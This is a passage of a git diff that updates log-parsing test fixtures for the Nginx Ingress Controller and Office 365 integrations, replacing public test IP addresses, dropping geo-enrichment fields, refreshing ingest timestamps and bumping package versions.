[07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1414,7 +1378,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1430,26 +1394,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1463,7 +1409,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1480,8 +1426,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394968Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", + "ingested": "2021-12-09T13:41:46.110231600Z", + "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1517,7 +1463,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1533,26 +1479,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/products/42?address=delhi+technological+university" @@ -1566,7 +1494,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1582,8 +1510,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394972700Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", + "ingested": "2021-12-09T13:41:46.110236800Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1614,7 +1542,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web2-8080", @@ -1630,26 +1558,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/v2" @@ -1663,7 +1573,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1679,8 +1589,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394984Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", + "ingested": "2021-12-09T13:41:46.110343100Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1716,7 +1626,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1732,26 +1642,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1765,7 +1657,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1781,8 +1673,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394988800Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f", + "ingested": "2021-12-09T13:41:46.110350500Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1818,7 +1710,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web2-8080", @@ -1834,26 +1726,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/v2/some" @@ -1867,7 +1741,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1883,8 +1757,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394994300Z", - "original": "77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402", + "ingested": "2021-12-09T13:41:46.110356700Z", + "original": "67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ diff --git a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index 1365c1a3d73..49a8aec4396 100644 --- a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json @@ -19,7 +19,7 @@ }, "message": "Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "event": { - "ingested": "2021-06-09T12:42:49.083062900Z", + "ingested": "2021-12-09T13:41:49.163645200Z", "original": "E1215 04:15:13.816036 8 config.go:489] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -54,7 +54,7 @@ }, "message": "\"Creating API client\" host=\"https://127.0.0.1:443\"", "event": { - "ingested": "2021-06-09T12:42:49.083081500Z", + "ingested": "2021-12-09T13:41:49.163654300Z", "original": "I1215 14:15:13.816067 8 main.go:236] \"Creating API client\" host=\"https://127.0.0.1:443\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -89,7 +89,7 @@ }, "message": "\"Trying to discover Kubernetes version\"", "event": { - "ingested": "2021-06-09T12:42:49.083087100Z", + "ingested": "2021-12-09T13:41:49.163660600Z", "original": "I1215 14:15:13.816334 8 main.go:256] \"Trying to discover Kubernetes version\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -124,7 +124,7 @@ }, "message": "Response Headers:", "event": { - "ingested": "2021-06-09T12:42:49.083093Z", + "ingested": "2021-12-09T13:41:49.163666700Z", "original": "I1215 14:15:13.816854 8 round_trippers.go:449] Response Headers:", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -159,7 +159,7 @@ }, "message": "Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "event": { - "ingested": "2021-06-09T12:42:49.083097800Z", + "ingested": "2021-12-09T13:41:49.163672700Z", "original": "F1215 14:16:33.326604 8 main.go:294] Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -194,7 +194,7 @@ }, "message": "curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "event": { - "ingested": "2021-06-09T12:42:49.083102Z", + "ingested": "2021-12-09T13:41:49.163677500Z", "original": "I1215 14:15:13.816598 8 round_trippers.go:423] curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -229,7 +229,7 @@ }, "message": "GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "event": { - "ingested": "2021-06-09T12:42:49.083105900Z", + "ingested": "2021-12-09T13:41:49.163682400Z", "original": "I1215 14:15:13.816837 8 round_trippers.go:443] GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml index 8b3faf3fbd8..5f79dcb9202 100644 --- a/packages/nginx_ingress_controller/manifest.yml +++ b/packages/nginx_ingress_controller/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx_ingress_controller title: Nginx Ingress Controller Logs -version: 1.2.0 +version: 1.2.1 license: basic description: Collect and parse logs from Nginx Ingress Controller instances with Elastic Agent. type: integration diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml index d57bdcbcc83..5d15fe3dcad 100644 --- a/packages/o365/changelog.yml +++ b/packages/o365/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json index 28cc7c19059..af5bceda098 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json @@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": 